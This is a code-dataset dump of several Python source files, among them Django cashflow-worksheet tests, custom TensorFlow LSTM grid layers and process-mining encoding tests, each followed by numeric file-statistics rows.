Account.objects.get(name="Interest Expenses"), JournalEntryLine.TYPE_DEBIT, 100)
other_jel_3 = self.factory.create_journal_entry_line(
other_jounral_entry,
Account.objects.get(name="Cash"), JournalEntryLine.TYPE_CREDIT, 1100)
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Paid off part of the truck # EXTRA ENTRY FROM WRONG PERIOD
'journal_entry_slug':other_jounral_entry.slug,
'operations':0,
'investments':0,
'finances':1100,
}, {
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':200,
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
# Drop that extra entry and try again.
data = data[1:]
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CashFlowWorksheet.objects.count(), 1)
def test_user_cant_create_a_cashflow_worksheet_with_netagive_numbers(self):
""" Test that a user can create a worksheet by submitting valid worksheet data.
"""
url = reverse("period-create-cashflow-worksheet", kwargs={"slug":self.period.slug})
data = [
{
# Cash for Common Stock.
'journal_entry_slug':self.jounral_entry_1.slug,
'operations':0,
'investments':0,
'finances':50000,
},{
# Inventory for Cash and credit.
'journal_entry_slug':self.jounral_entry_2.slug,
'operations':5000,
'investments':0,
'finances':0,
},{
# Bought a Truck.
'journal_entry_slug':self.jounral_entry_3.slug,
'operations':0,
'investments':5000,
'finances':0,
},{
# Sold some inventory for a profit
'journal_entry_slug':self.jounral_entry_4.slug,
'operations':6500,
'investments':0,
'finances':0,
},{
# Pay off some part of the truck
'journal_entry_slug':self.jounral_entry_5.slug,
'operations':-200, # NEGATIVE NUMBER
'investments':0,
'finances':2000,
},
# NON CASH TRANSACTIONS
# {
# 'journal_entry_slug':self.jounral_entry_6.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
# {
# 'journal_entry_slug':self.jounral_entry_7.slug,
# 'operations':0,
# 'investments':0,
# 'finances':0,
# },
]
self.assertEqual(CashFlowWorksheet.objects.count(), 0)
response = self.client.post(
url, json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue("operations must be greater than 0" in str(response.data))
| 40.503546
| 122
| 0.557941
| 2,954
| 28,555
| 5.156398
| 0.085308
| 0.081933
| 0.103992
| 0.073529
| 0.84933
| 0.842962
| 0.825827
| 0.813747
| 0.78427
| 0.726037
| 0
| 0.040195
| 0.33959
| 28,555
| 704
| 123
| 40.56108
| 0.767526
| 0.163684
| 0
| 0.671706
| 0
| 0
| 0.141141
| 0.018446
| 0
| 0
| 0
| 0
| 0.086393
| 1
| 0.025918
| false
| 0
| 0.012959
| 0
| 0.041037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2257ad2e23294e492e033c2cbab072ae34b3c591
| 16,351
|
py
|
Python
|
2D_RNN/detailed_layer.py
|
Romit-Maulik/Tutorials-Demos-Practice
|
a58ddc819f24a16f7059e63d7f201fc2cd23e03a
|
[
"MIT"
] | null | null | null |
2D_RNN/detailed_layer.py
|
Romit-Maulik/Tutorials-Demos-Practice
|
a58ddc819f24a16f7059e63d7f201fc2cd23e03a
|
[
"MIT"
] | null | null | null |
2D_RNN/detailed_layer.py
|
Romit-Maulik/Tutorials-Demos-Practice
|
a58ddc819f24a16f7059e63d7f201fc2cd23e03a
|
[
"MIT"
] | null | null | null |
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
parent_path = os.path.dirname(dir_path)
import tensorflow as tf
tf.random.set_seed(10)
tf.keras.backend.set_floatx('float32')
# Special layer to have more control over LSTM encoder cell
class LSTM_grid_layer_v1(tf.keras.layers.Layer):
def __init__(self, input_dim_list, seq_len_list):
super(LSTM_encoder_layer, self).__init__()
self.num_dof = len(input_dim_list)
self.input_dim_list = input_dim_list
self.seq_len_list = seq_len_list
self.initialize_layer()
def initialize_layer(self):
var_init = tf.random_normal_initializer()
self.wu_list = []
self.wf_list = []
self.wo_list = []
self.wc_list = []
self.bu_list = []
self.bf_list = []
self.bo_list = []
self.bc_list = []
self.m_list = []
self.h_list = []
for i in range(self.num_dof):
self.wu_list.append(
tf.Variable(
initial_value=var_init(shape=(2*self.input_dim_list[i], self.input_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.wf_list.append(
tf.Variable(
initial_value=var_init(shape=(2*self.input_dim_list[i], self.input_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.wo_list.append(
tf.Variable(
initial_value=var_init(shape=(2*self.input_dim_list[i], self.input_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.wc_list.append(
tf.Variable(
initial_value=var_init(shape=(2*self.input_dim_list[i], self.input_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.bu_list.append(
tf.Variable(
initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.bf_list.append(
tf.Variable(
initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.bo_list.append(
tf.Variable(
initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.bc_list.append(
tf.Variable(
initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
trainable=True
)
)
@tf.function
def call(self, input_list):
hh_list = []
mm_list = []
for j in range(self.num_dof): # For each state vector input
seq_length = self.seq_len_list[j]
hh = tf.zeros(shape=(tf.shape(input_list[j])[0],self.input_dim_list[j]),dtype='float32') # batch_size x state_dimension
mm = tf.zeros(shape=(tf.shape(input_list[j])[0],self.input_dim_list[j]),dtype='float32') # batch_size x state_dimension
# For time dimension unroll
for i in range(seq_length):
raw_inputs = input_list[j][:,i]
inputs = tf.concat([raw_inputs,hh],axis=-1)
gu = tf.nn.sigmoid(tf.matmul(inputs,self.wu_list[j]) + self.bu_list[j])
gf = tf.nn.sigmoid(tf.matmul(inputs,self.wf_list[j]) + self.bf_list[j])
go = tf.nn.sigmoid(tf.matmul(inputs,self.wo_list[j]) + self.bo_list[j])
gc = tf.nn.tanh(tf.matmul(inputs,self.wc_list[j]) + self.bc_list[j])
mm = gf*mm + gu*gc
hh = tf.nn.tanh(go*mm)
hh_list.append(hh)
mm_list.append(mm)
return hh_list, mm_list
# Special layer to have more control over LSTM grid cell
class LSTM_grid_layer_v2(tf.keras.layers.Layer):
def __init__(self, grid_dim, output_dim_list, seq_len_list):
super(LSTM_grid_layer, self).__init__()
self.num_dof = len(output_dim_list)
self.output_dim_list = output_dim_list
self.seq_len_list = seq_len_list
self.grid_dim = grid_dim
self.initialize_layer()
def initialize_layer(self):
var_init = tf.random_normal_initializer()
self.wu_list = []
self.wf_list = []
self.wo_list = []
self.wc_list = []
self.bu_list = []
self.bf_list = []
self.bo_list = []
self.bc_list = []
self.m_list = []
self.h_list = []
for i in range(self.num_dof):
self.wu_list.append(
tf.Variable(
initial_value=var_init(shape=(self.grid_dim, self.output_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.wf_list.append(
tf.Variable(
initial_value=var_init(shape=(self.grid_dim, self.output_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.wo_list.append(
tf.Variable(
initial_value=var_init(shape=(self.grid_dim, self.output_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.wc_list.append(
tf.Variable(
initial_value=var_init(shape=(self.grid_dim, self.output_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.bu_list.append(
tf.Variable(
initial_value=var_init(shape=(self.output_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.bf_list.append(
tf.Variable(
initial_value=var_init(shape=(self.output_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.bo_list.append(
tf.Variable(
initial_value=var_init(shape=(self.output_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.bc_list.append(
tf.Variable(
initial_value=var_init(shape=(self.output_dim_list[i],), dtype="float32"),
trainable=True
)
)
@tf.function
def call(self, hidden, memory):
'''
Hidden and memory are lists of tensors for the hidden state and the memory of different inputs
'''
for j in range(self.num_dof): # For each state vector
seq_length = self.seq_len_list[j]
# For time dimension unroll
for i in range(seq_length):
inputs = tf.concat([hidden[j],memory[j]],axis=-1)
gu = tf.nn.sigmoid(tf.matmul(inputs,self.wu_list[j]) + self.bu_list[j])
gf = tf.nn.sigmoid(tf.matmul(inputs,self.wf_list[j]) + self.bf_list[j])
go = tf.nn.sigmoid(tf.matmul(inputs,self.wo_list[j]) + self.bo_list[j])
gc = tf.nn.tanh(tf.matmul(inputs,self.wc_list[j]) + self.bc_list[j])
memory[j] = gf*memory[j] + gu*gc
hidden[j] = tf.nn.tanh(go*memory[j])
return hidden, memory
# Special layer to have more control over LSTM grid cell
class Original_LSTM_grid_layer(tf.keras.layers.Layer):
def __init__(self, input_dim_list, seq_length):
super(Original_LSTM_grid_layer, self).__init__()
self.num_dof = len(input_dim_list)
self.input_dim_list = input_dim_list
self.seq_length = seq_length
self.state_len = sum(input_dim_list)
self.initialize_layer()
def initialize_layer(self):
var_init = tf.random_normal_initializer()
self.wu_list = []
self.wf_list = []
self.wo_list = []
self.wc_list = []
self.bu_list = []
self.bf_list = []
self.bo_list = []
self.bc_list = []
for i in range(self.num_dof):
self.wu_list.append(
tf.Variable(
initial_value=var_init(shape=(2*self.input_dim_list[i], self.input_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.wf_list.append(
tf.Variable(
initial_value=var_init(shape=(2*self.input_dim_list[i], self.input_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.wo_list.append(
tf.Variable(
initial_value=var_init(shape=(2*self.input_dim_list[i], self.input_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.wc_list.append(
tf.Variable(
initial_value=var_init(shape=(2*self.input_dim_list[i], self.input_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.bu_list.append(
tf.Variable(
initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.bf_list.append(
tf.Variable(
initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.bo_list.append(
tf.Variable(
initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.bc_list.append(
tf.Variable(
initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.grid_wu_list = []
self.grid_wf_list = []
self.grid_wo_list = []
self.grid_wc_list = []
self.grid_bu_list = []
self.grid_bf_list = []
self.grid_bo_list = []
self.grid_bc_list = []
for i in range(self.num_dof):
self.grid_wu_list.append(
tf.Variable(
initial_value=var_init(shape=(self.state_len, self.input_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.grid_wf_list.append(
tf.Variable(
initial_value=var_init(shape=(self.state_len, self.input_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.grid_wo_list.append(
tf.Variable(
initial_value=var_init(shape=(self.state_len, self.input_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.grid_wc_list.append(
tf.Variable(
initial_value=var_init(shape=(self.state_len, self.input_dim_list[i]), dtype="float32"),
trainable=True
)
)
self.grid_bu_list.append(
tf.Variable(
initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.grid_bf_list.append(
tf.Variable(
initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.grid_bo_list.append(
tf.Variable(
initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
trainable=True
)
)
self.grid_bc_list.append(
tf.Variable(
initial_value=var_init(shape=(self.input_dim_list[i],), dtype="float32"),
trainable=True
)
)
@tf.function
def call(self, inputs_list):
h_list = []
m_list = []
for i in range(self.num_dof):
batch_dim = tf.shape(inputs_list[i])[0]
state_dim = tf.shape(inputs_list[i])[2]
hidden = tf.zeros(shape=(batch_dim,state_dim),dtype='float32')
memory = tf.zeros(shape=(batch_dim,state_dim),dtype='float32')
h_list.append(hidden)
m_list.append(memory)
# For time dimension unroll
for i in range(self.seq_length):
# For each grid input
for j in range(self.num_dof):
temp_input_dim = tf.convert_to_tensor(inputs_list[j])[:,i]
inputs = tf.concat([temp_input_dim,h_list[j]],axis=-1)
gu = tf.nn.sigmoid(tf.matmul(inputs,self.wu_list[j]) + self.bu_list[j])
gf = tf.nn.sigmoid(tf.matmul(inputs,self.wf_list[j]) + self.bf_list[j])
go = tf.nn.sigmoid(tf.matmul(inputs,self.wo_list[j]) + self.bo_list[j])
gc = tf.nn.tanh(tf.matmul(inputs,self.wc_list[j]) + self.bc_list[j])
m_list[j] = gf*m_list[j] + gu*gc
h_list[j] = tf.nn.tanh(go*m_list[j])
hgrid = tf.concat(h_list,axis=-1)
# For each grid input
for j in range(self.num_dof):
gu = tf.nn.sigmoid(tf.matmul(hgrid,self.grid_wu_list[j]) + self.grid_bu_list[j])
gf = tf.nn.sigmoid(tf.matmul(hgrid,self.grid_wf_list[j]) + self.grid_bf_list[j])
go = tf.nn.sigmoid(tf.matmul(hgrid,self.grid_wo_list[j]) + self.grid_bo_list[j])
gc = tf.nn.tanh(tf.matmul(hgrid,self.grid_wc_list[j]) + self.grid_bc_list[j])
m_list[j] = gf*m_list[j] + gu*gc
h_list[j] = tf.nn.tanh(go*m_list[j])
return h_list, m_list
@tf.function
def regularizer_loss(self):
regularizer = tf.keras.regularizers.L1(0.01)
loss = tf.zeros(shape=(1,), dtype=tf.dtypes.float32, name=None)
for i in range(self.num_dof):
loss = loss + regularizer(self.wu_list[i]) + regularizer(self.bu_list[i]) + \
regularizer(self.wf_list[i]) + regularizer(self.bf_list[i]) + \
regularizer(self.wo_list[i]) + regularizer(self.bo_list[i]) + \
regularizer(self.wc_list[i]) + regularizer(self.bc_list[i]) + \
regularizer(self.grid_wu_list[i]) + regularizer(self.grid_bu_list[i]) + \
regularizer(self.grid_wf_list[i]) + regularizer(self.grid_bf_list[i]) + \
regularizer(self.grid_wo_list[i]) + regularizer(self.grid_bo_list[i]) + \
regularizer(self.grid_wc_list[i]) + regularizer(self.grid_bc_list[i])
return loss
| 35.623094
| 131
| 0.484068
| 1,852
| 16,351
| 4.012419
| 0.068575
| 0.039026
| 0.069439
| 0.081819
| 0.85399
| 0.797066
| 0.785762
| 0.767461
| 0.746871
| 0.719553
| 0
| 0.010425
| 0.407498
| 16,351
| 459
| 132
| 35.623094
| 0.756606
| 0.029906
| 0
| 0.572674
| 0
| 0
| 0.016363
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02907
| false
| 0
| 0.005814
| 0
| 0.055233
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
225cda4ef7bb085bfe0b22dd13de61ac233d014f
| 83
|
py
|
Python
|
pipeline/trainers/classification.py
|
PavelOstyakov/pipeline
|
236c050af3be9dbb534e959589040e9433501e2b
|
[
"MIT"
] | 214
|
2019-01-25T17:03:43.000Z
|
2022-03-08T08:03:27.000Z
|
pipeline/trainers/classification.py
|
anisayari/pipeline
|
48313bc5c459fde0d3fc0acd9f78ccfb677a5197
|
[
"MIT"
] | 10
|
2019-01-25T17:14:02.000Z
|
2019-03-17T21:06:43.000Z
|
pipeline/trainers/classification.py
|
anisayari/pipeline
|
48313bc5c459fde0d3fc0acd9f78ccfb677a5197
|
[
"MIT"
] | 60
|
2019-01-25T17:12:57.000Z
|
2022-02-12T23:52:58.000Z
|
from .base import TrainerBase
class TrainerClassification(TrainerBase):
pass
| 13.833333
| 41
| 0.795181
| 8
| 83
| 8.25
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.156627
| 83
| 5
| 42
| 16.6
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
2275b0a8eeaf49b05fd8be2eff9edd261f04fe53
| 12,602
|
py
|
Python
|
src/encoding/tests/test_simple_index.py
|
HitLuca/predict-python
|
14f2f55cb29f817a5871d4c0b11a3758285301ca
|
[
"MIT"
] | null | null | null |
src/encoding/tests/test_simple_index.py
|
HitLuca/predict-python
|
14f2f55cb29f817a5871d4c0b11a3758285301ca
|
[
"MIT"
] | 6
|
2020-01-28T23:07:17.000Z
|
2022-02-10T00:41:56.000Z
|
src/encoding/tests/test_simple_index.py
|
HitLuca/predict-python
|
14f2f55cb29f817a5871d4c0b11a3758285301ca
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from src.encoding.common import encode_label_logs, LabelTypes
from src.encoding.models import TaskGenerationTypes, ValueEncodings
from src.encoding.simple_index import simple_index
from src.predictive_model.models import PredictiveModels
from src.utils.file_service import get_log
from src.utils.tests_utils import general_example_filepath, general_example_train_filepath, \
general_example_test_filepath, general_example_test_filename, create_test_log, general_example_train_filename, \
create_test_predictive_model, create_test_job, create_test_encoding, create_test_labelling, general_example_filename
from django.test import TestCase
from src.encoding.common import encode_label_logs, LabelTypes
from src.encoding.models import TaskGenerationTypes, ValueEncodings
from src.encoding.simple_index import simple_index
from src.predictive_model.models import PredictiveModels
from src.utils.file_service import get_log
from src.utils.tests_utils import general_example_filepath, general_example_train_filepath, \
general_example_test_filepath, general_example_test_filename, create_test_log, general_example_train_filename, \
create_test_predictive_model, create_test_job, create_test_encoding, create_test_labelling, general_example_filename
class TestSplitLogExample(TestCase):
def setUp(self):
self.test_log = get_log(create_test_log(log_name=general_example_test_filename,
log_path=general_example_test_filepath))
self.training_log = get_log(create_test_log(log_name=general_example_train_filename,
log_path=general_example_train_filepath))
self.labelling = create_test_labelling(label_type=LabelTypes.REMAINING_TIME.value)
self.encoding = create_test_encoding(
value_encoding=ValueEncodings.SIMPLE_INDEX.value,
add_elapsed_time=True,
task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
prefix_length=1)
def test_shape_training(self):
training_df, test_df = encode_label_logs(self.training_log, self.test_log, create_test_job(
encoding=self.encoding,
labelling=self.labelling,
predictive_model=create_test_predictive_model(
predictive_model=PredictiveModels.CLASSIFICATION.value)
))
self.assert_shape(training_df, (4, 4))
self.assert_shape(test_df, (2, 4))
def assert_shape(self, dataframe, shape):
self.assertIn("trace_id", dataframe.columns.values)
self.assertIn("label", dataframe.columns.values)
self.assertIn("elapsed_time", dataframe.columns.values)
self.assertIn("prefix_1", dataframe.columns.values)
self.assertEqual(shape, dataframe.shape)
def test_prefix_length_training(self):
encoding = create_test_encoding(
value_encoding=ValueEncodings.SIMPLE_INDEX.value,
add_elapsed_time=True,
task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
prefix_length=3)
training_df, test_df = encode_label_logs(self.training_log, self.test_log, create_test_job(
encoding=encoding,
labelling=self.labelling,
predictive_model=create_test_predictive_model(
predictive_model=PredictiveModels.CLASSIFICATION.value)
))
self.assertIn("prefix_1", training_df.columns.values)
self.assertIn("prefix_2", training_df.columns.values)
self.assertIn("prefix_3", training_df.columns.values)
self.assertEqual((4, 6), training_df.shape)
self.assertEqual((2, 6), test_df.shape)
row = training_df[(training_df.trace_id == '3')].iloc[0]
self.assertEqual(1, row.prefix_1)
self.assertEqual(2, row.prefix_2)
self.assertEqual(1, row.prefix_3)
self.assertEqual(False, row.label)
self.assertEqual(0, row.elapsed_time)
def test_row_test(self):
training_df, test_df = encode_label_logs(self.training_log, self.test_log, create_test_job(
encoding=self.encoding,
labelling=self.labelling,
predictive_model=create_test_predictive_model(
predictive_model=PredictiveModels.CLASSIFICATION.value)
))
row = test_df[(test_df.trace_id == '4')].iloc[0]
self.assertEqual(1, row.prefix_1)
self.assertEqual(0, row.elapsed_time)
self.assertEqual(0, row.label)
def test_prefix0(self):
encoding = create_test_encoding(
value_encoding=ValueEncodings.FREQUENCY.value,
add_elapsed_time=True,
task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
prefix_length=0)
self.assertRaises(ValueError,
encode_label_logs, self.training_log, self.test_log, create_test_job(
encoding=encoding,
labelling=self.labelling,
predictive_model=create_test_predictive_model(
predictive_model=PredictiveModels.CLASSIFICATION.value)
))
class TestGeneralTest(TestCase):
"""Making sure it actually works"""
def setUp(self):
self.log = get_log(create_test_log(log_name=general_example_test_filename,
log_path=general_example_test_filepath))
self.labelling = create_test_labelling(label_type=LabelTypes.REMAINING_TIME.value)
self.encoding = create_test_encoding(
value_encoding=ValueEncodings.SIMPLE_INDEX.value,
task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
add_elapsed_time=True,
prefix_length=1)
def test_header(self):
df = simple_index(self.log, self.labelling, self.encoding)
self.assertIn("trace_id", df.columns.values)
self.assertIn("label", df.columns.values)
self.assertIn("elapsed_time", df.columns.values)
self.assertIn("prefix_1", df.columns.values)
def test_prefix1(self):
df = simple_index(self.log, self.labelling, self.encoding)
self.assertEqual(df.shape, (2, 4))
row1 = df[df.trace_id == '5'].iloc[0]
self.assertListEqual(['5', 'register request', 0.0, 1576440.0], row1.values.tolist())
row2 = df[df.trace_id == '4'].iloc[0]
self.assertListEqual(['4', 'register request', 0.0, 520920.0], row2.values.tolist())
def test_prefix1_no_label(self):
df = simple_index(self.log, create_test_labelling(label_type=LabelTypes.NO_LABEL.value), self.encoding)
self.assertEqual(df.shape, (2, 2))
row1 = df[df.trace_id == '5'].iloc[0]
self.assertListEqual(['5', 'register request'], row1.values.tolist())
row2 = df[df.trace_id == '4'].iloc[0]
self.assertListEqual(['4', 'register request'], row2.values.tolist())
def test_prefix1_no_elapsed_time(self):
label = create_test_labelling(label_type=LabelTypes.REMAINING_TIME.value)
encoding = create_test_encoding(
value_encoding=ValueEncodings.FREQUENCY.value,
task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
prefix_length=1)
df = simple_index(self.log, label, encoding)
self.assertEqual(df.shape, (2, 3))
row1 = df[df.trace_id == '5'].iloc[0]
self.assertListEqual(['5', 'register request', 1576440.0], row1.values.tolist())
row2 = df[df.trace_id == '4'].iloc[0]
self.assertListEqual(['4', 'register request', 520920.0], row2.values.tolist())
def test_prefix2(self):
df = simple_index(self.log, self.labelling, create_test_encoding(
value_encoding=ValueEncodings.FREQUENCY.value,
add_elapsed_time=True,
task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
prefix_length=2))
self.assertEqual(df.shape, (2, 5))
row1 = df[df.trace_id == '5'].iloc[0]
self.assertListEqual(['5', 'register request', 'examine casually', 90840.0, 1485600.0], row1.values.tolist())
row2 = df[df.trace_id == '4'].iloc[0]
self.assertListEqual(['4', 'register request', 'check ticket', 75840.0, 445080.0], row2.values.tolist())
def test_prefix5(self):
df = simple_index(self.log, self.labelling, create_test_encoding(
value_encoding=ValueEncodings.FREQUENCY.value,
add_elapsed_time=True,
task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
prefix_length=5))
self.assertEqual(df.shape, (2, 8))
row1 = df[df.trace_id == '5'].iloc[0]
self.assertListEqual(
['5', 'register request', 'examine casually', 'check ticket', 'decide', 'reinitiate request', 458160.0,
1118280.0], row1.values.tolist())
self.assertFalse(df.isnull().values.any())
def test_prefix10(self):
df = simple_index(self.log, self.labelling, create_test_encoding(
value_encoding=ValueEncodings.FREQUENCY.value,
add_elapsed_time=True,
task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
prefix_length=10))
self.assertEqual(df.shape, (1, 13))
row1 = df[df.trace_id == '5'].iloc[0]
self.assertListEqual(
['5', 'register request', 'examine casually', 'check ticket', 'decide', 'reinitiate request',
'check ticket', 'examine casually', 'decide', 'reinitiate request', 'examine casually', 1296240.0,
280200.0], row1.values.tolist())
def test_prefix10_padding(self):
df = simple_index(self.log, self.labelling, create_test_encoding(
value_encoding=ValueEncodings.FREQUENCY.value,
add_elapsed_time=True,
task_generation_type=TaskGenerationTypes.ONLY_THIS.value,
prefix_length=10, padding=True))
self.assertEqual(df.shape, (2, 13))
row1 = df[df.trace_id == '4'].iloc[0]
self.assertListEqual(
['4', 'register request', 'check ticket', 'examine thoroughly', 'decide', 'reject request', 0, 0, 0,
0, 0, 520920.0, 0.0], row1.values.tolist())
self.assertFalse(df.isnull().values.any())
def test_prefix10_all_in_one(self):
encoding = create_test_encoding(
value_encoding=ValueEncodings.FREQUENCY.value,
add_elapsed_time=True,
task_generation_type=TaskGenerationTypes.ALL_IN_ONE.value,
prefix_length=10)
df = simple_index(self.log, self.labelling, encoding)
self.assertEqual(df.shape, (10, 13))
row1 = df[df.trace_id == '5'].iloc[9]
self.assertListEqual(
['5', 'register request', 'examine casually', 'check ticket', 'decide', 'reinitiate request',
'check ticket', 'examine casually', 'decide', 'reinitiate request', 'examine casually', 1296240.0,
280200.0], row1.values.tolist())
self.assertFalse(df.isnull().values.any())
def test_prefix10_padding_all_in_one(self):
encoding = create_test_encoding(
value_encoding=ValueEncodings.FREQUENCY.value,
add_elapsed_time=True,
task_generation_type=TaskGenerationTypes.ALL_IN_ONE.value,
prefix_length=10,
padding=True)
df = simple_index(self.log, self.labelling, encoding)
self.assertEqual(df.shape, (15, 13))
row1 = df[df.trace_id == '4'].iloc[4]
self.assertListEqual(
['4', 'register request', 'check ticket', 'examine thoroughly', 'decide', 'reject request', 0, 0, 0,
0, 0, 520920.0, 0.0], row1.values.tolist())
self.assertFalse(df.isnull().values.any())
def test_eval(self):
encoding = create_test_encoding(
value_encoding=ValueEncodings.FREQUENCY.value,
task_generation_type=TaskGenerationTypes.ALL_IN_ONE.value,
add_elapsed_time=True,
prefix_length=12,
padding=True)
df = simple_index(
get_log(create_test_log(log_path=general_example_filepath, log_name=general_example_filename)),
create_test_labelling(label_type=LabelTypes.REMAINING_TIME.value), encoding)
self.assertEqual(df.shape, (41, 15))
row1 = df[df.trace_id == '4'].iloc[4]
self.assertListEqual(
['4', 'register request', 'check ticket', 'examine thoroughly', 'decide', 'reject request', 0, 0, 0,
0, 0, 0, 0, 520920.0, 0.0], row1.values.tolist())
self.assertFalse(df.isnull().values.any())
| 47.91635
| 120
| 0.670052
| 1,507
| 12,602
| 5.348374
| 0.086928
| 0.048387
| 0.017866
| 0.019107
| 0.894913
| 0.854963
| 0.812283
| 0.774194
| 0.762407
| 0.762407
| 0
| 0.031279
| 0.221155
| 12,602
| 262
| 121
| 48.099237
| 0.789913
| 0.002301
| 0
| 0.626667
| 0
| 0
| 0.064773
| 0
| 0
| 0
| 0
| 0
| 0.244444
| 1
| 0.08
| false
| 0
| 0.062222
| 0
| 0.151111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3f59d8c69371420841ae177e7c8bd52daf3ed472
| 24
|
py
|
Python
|
boss/code/CFG/__init__.py
|
henrymoss/BOSS
|
f19eaf7231ed007cce9e12fba0f7f936eb48cfdb
|
[
"Apache-2.0"
] | 16
|
2020-10-06T16:23:29.000Z
|
2022-03-28T05:17:06.000Z
|
boss/code/CFG/__init__.py
|
henrymoss/BOSS
|
f19eaf7231ed007cce9e12fba0f7f936eb48cfdb
|
[
"Apache-2.0"
] | 2
|
2021-11-09T19:21:44.000Z
|
2021-11-29T08:01:19.000Z
|
boss/code/CFG/__init__.py
|
henrymoss/BOSS
|
f19eaf7231ed007cce9e12fba0f7f936eb48cfdb
|
[
"Apache-2.0"
] | 4
|
2021-09-15T11:36:24.000Z
|
2022-02-23T03:33:14.000Z
|
from .CFG import Grammar
| 24
| 24
| 0.833333
| 4
| 24
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 24
| 1
| 24
| 24
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
